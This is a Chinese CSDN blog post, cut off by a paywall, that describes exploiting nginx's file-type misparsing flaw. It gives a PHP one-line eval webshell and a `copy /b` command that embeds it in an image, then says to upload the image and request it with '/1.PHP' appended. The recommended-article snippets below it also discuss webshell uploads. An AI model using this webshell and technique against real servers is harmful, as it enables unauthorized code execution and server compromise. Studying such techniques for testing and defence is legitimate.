WEBSHELL姿势之nginx文件类型错误解析漏洞实例

最新推荐文章于 2024-02-01 13:22:58 发布
最新推荐文章于 2024-02-01 13:22:58 发布
阅读量1.7k 收藏
点赞数
分类专栏: WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/calmegm/article/details/49055895
版权

关于nginx文件类型错误解析可参看我的上一篇文章

已知测试系统存在nginx文件类型错误解析漏洞,我们要找的就是一个图片上传点。


于是我们找一个回帖处的上传附件,这里先介绍一下制作木马图片

图片任取一张(有时不同格式的图片,可能运行有差异,jpg、png、gif都可以试试)

至于一句话木马,网上各种变异也很多,这里由于是测试,我们简单使用

<?php @eval($_POST['chopper']);?>
在windows环境下,使用命令 

copy upload.png/b+shell.php/a shell.png
生成图片木马

上传成功后,找到图片地址在后面加上/1.PHP

最低0.47元/天 解锁文章
6um1n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用 通达OA 文件上传漏洞上传webshell获取主机权限
04-30
帮客户搭建一个演示环境,用于给领导演示,这里我利用了通达OA11.6文件上传漏洞往靶机上上传了一个webshell,然后通过蚁剑去连接webshell从而获取主机权限。 环境要求: 1.靶机环境win10 2.通达OA版本11.6 3.攻击机...
nginx虚拟主机防webshell完美版
09-30
nginx虚拟主机防webshell完美版,使用nginx的朋友可以参考下。
nginx文件类型错误解析漏洞
心 境地
05-10 2852
问题简介: nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。nginx默认以cgi的方式支持php的运行,而为了较好的支持PATH_INFO的提取,在PHP的配置选项里存在cgi.fix_pathinfo选项,其目的是为了从SCRIPT_FILENAME里取出真正的脚本名,而攻击者则利用这点可以将任何类型文件以PHP的方式进行解析
负载均衡下webshell连接、nginx解析漏洞、sql注入第一关
最新发布
zhnagzhigong的博客
02-01 251
http://your-ip/uploadfiles/level2.png/1.php(your-ip是你的地址)在该文件夹中创建一个名为level2.png的文件,并将其中插入恶意的PHP代码。引用中提供了一个nginx空字节漏洞复现环境的压缩包,你可以下载并解压该压缩包。解压后,你将得到一个包含nginx和php的Windows环境。打开解压后的nginx目录,找到nginx.conf文件并打开。在解压后的nginx目录中,找到uploadfiles文件夹。打开命令行窗口,进入nginx目录。
nginx负载均衡下的webshell上传
m0_63069714的博客
02-14 540
因为我们是反向代理的负载均衡,就存在上传文件出现一台后端服务器上有我们上传的文件,另一台服务器上没有我们上传的文件,出现的结果就是,一旦一台服务器上没有,那么在请求轮到这台服务器的时候,就会报出404的错误,从而影响使用,这也就是一会出现正常,一会出现错误的原因。当我们上传一个较大的文件时,由于AntSword上传文件时,采用的是分片上传方式,把一个文件分成了多次HTTP请求发送给目标,造成文件的一部分内容在A这台服务器上,另一部分文件在B这台服务器上,从而使得较大的工具或者文件无法打开或者使用。
nginx反向代理+负载均衡上传webshell重难点+apache漏洞
qq_52807816的博客
02-12 460
nginx能够提供强大的连接并发请求而没有很好的稳定性,结合这两种截然不同的特征,可以在内网的前端使用nginx作为反向代理服务器,后方的apache作为原始服务器,这样既满足大量的连接并发请求,也具有良好的稳定性。前端nginx代理的工作完成之后就要搭建后方的lamp环境了,搭建lamp环境不是这篇文章的重点,所以过程我这也不再列出来了,参考《lamp环境搭建–源码安装 》。缓存数据是保存在文件中的,缓存的键和文件名都是在代理URL上执行MD5的结果。levels参数定义了缓存的层次结构。
nginx安全】nginx虚拟主机防webshell跨目录
红尘道,红尘练心
06-02 465
1.在nginx.conf里把每个虚拟主机站点请求端口给区别开   server { listen 80;server_name www.key0.cn;index index.html index.htm index.php;root /var/www/test; #limit_conn crawler 20; location ~ ...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
AWD攻防漏洞分析——文件上传
01-20
这个漏洞在DVBBS6.0时代被hacker们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级高,入侵中上传漏洞也是常见的漏洞。 导致改漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以...
WebShell文件上传漏洞分析溯源(第3题)
02-22
WebShell 文件上传漏洞分析溯源 本文将对 WebShell 文件上传漏洞进行深入分析,探讨其原理、危害性以及防御方法。同时,通过实践演示,展示如何绕过页面对可执行文件上传的限制,利用 WebShell 读取服务器上的源...
nginx虚拟主机防webshell 完美版
东杰书屋
09-26 1640
本文由DoDo原创我们先来看下nginx.conf  server  {    listen       80;    server_name  www.a.com;    index index.html index.htm index.php;    root  /data/htdocs/www.a.com/;    #limit_conn   crawler  20;   
linux nginx 漏洞利用,Nginx解析漏洞复现以及哥斯拉连接Webshell实践
weixin_29837797的博客
05-16 342
开心上传Webshell后,竟然连不上去,用Burpsuite抓包查看报了这个错误,具体的原因没有深究,百度了一下解决方法就是修改php.ini配置文件中的session.auto_start = 1 之前的phpinfo内有相关路径(/usr/local/etc/php/conf.d/php.ini) docker exec -t -i nginx_parsing_vulnerability_p...
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3677
网站Getshell的方法
nginx 上传文件漏洞_文件上传及解析漏洞
weixin_30444517的博客
12-29 1665
注:本文仅供学习参考文件上传定义:文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。即便很容易被攻击者利用漏洞,但是在今天的现代互联网的Web应用程序,它是一种常见的要求,因为它有助于提高业务效率。企业支持门户,给用户各企业...
CTF writeup:tomcat上传webshell后门
samohyes的博客
07-01 5004
做了ZJU school-bus的一个题目,给了链接,***:**,在IP加端口后面写入manager/html跳出让你输密码,网上找个弱口令尝试的py文件很快就可以解出来。 tomcat:tomcat。 后面进去了网站要往上传个后门,找了好多地方没找到后门,自己写暂时水平不够,后来终于找到了一个。 https://scoperchiatore.wordpress.com/my-webshe
网站安全漏洞测试之CMS上传与sql注入攻击
网站安全专家
06-03 1187
近日,我们SINE安全在对某客户的网站进行网站漏洞检测与修复发现该网站存在严重的sql注入漏洞以及上传webshell网站木马文件漏洞,该网站使用的是某CMS系统,采用PHP语言开发,mysql数据库的架构,该网站源码目前是开源的状态。 某CMS是专注于提供付费知识的社交CMS系统,知识付费在目前的互联网中有这很高的需求,该系统可以对文档进行分享,收费下载,用户发布的知识内容可以隐藏,提供给...
nginx, PHP上传文件设置
xiojing的博客
07-24 1605
上传文件太大导致超时或者返回413.设置如下项: 1./etc/php/7.0/fpm文件夹下的php.ini post_max_size = 1400M upload_max_filesize = 1400M 2.nginx 配置 server 模块中: client_max_body_size 1400M; location ~ .php 模块中: client_body_...
apache与nginx上传目录无执行权限的解决办法
toplover2的linux学习博客
02-15 766
对apache上传目录设置无权限的例子: Order Allow,Deny Deny from all 对nginx上传目录无执行权限 location ~ ^/upload/.*\.(php|php5)$ { deny all; } 这些配置表面上看起来是没什么问题的,确实在windows下可以这么说。 但是*nux就不同了,大家都是知道的*nux操作系统是区分大小写的,这里如
利用Web文件上传漏洞获取Webshell的实战教程
文件上传漏洞是指网站设计时未能正确验证用户上传的文件类型或内容,这可能导致恶意用户上传恶意脚本或代码,从而对网站服务器和数据安全构成威胁。 案例1涉及一个低级别的文件上传漏洞,通过一个靶机上的网站进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值